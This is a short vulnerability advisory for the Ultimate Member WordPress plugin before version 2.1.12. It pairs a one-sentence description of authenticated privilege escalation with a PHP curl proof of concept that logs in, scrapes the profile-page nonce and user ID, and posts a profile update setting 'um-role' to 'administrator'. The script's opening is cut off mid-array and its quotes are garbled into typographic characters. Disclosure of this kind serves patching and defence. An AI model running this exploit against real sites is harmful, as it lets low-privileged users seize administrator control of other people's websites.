Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

Due to the fact that Ultimate Member allowed the creation of new roles, this plugin also made it possible for site administrators to grant secondary Ultimate Member roles for all users upon a /wp-admin profile update.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/_wpnonce"\svalue=“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; // Pull the user_id $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/“checkuser_id”\svalue=“([^”]+)"/’, $content, $matches); $user_id = $matches[1]; // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/profile.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘%2Fwp-admin%2Fprofile.php’, ‘from’ => ‘profile’, ‘check_userid’ => $user_id, ‘admin_bar_front’ => ‘1’, ‘first_name’ => $name, ‘last_name’ => $lastname, ‘nickname’ => $nickname, ‘email’ => $email, ‘url’ => ‘’, ‘description’ => ‘’, ‘pass1’ => ‘’, ‘pass2’ => ‘’, ‘um-role’ => ‘administrator’, ‘action’ => ‘update’, ‘user_id’ => $user_id, ‘submit’ => ‘Update+Profile’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>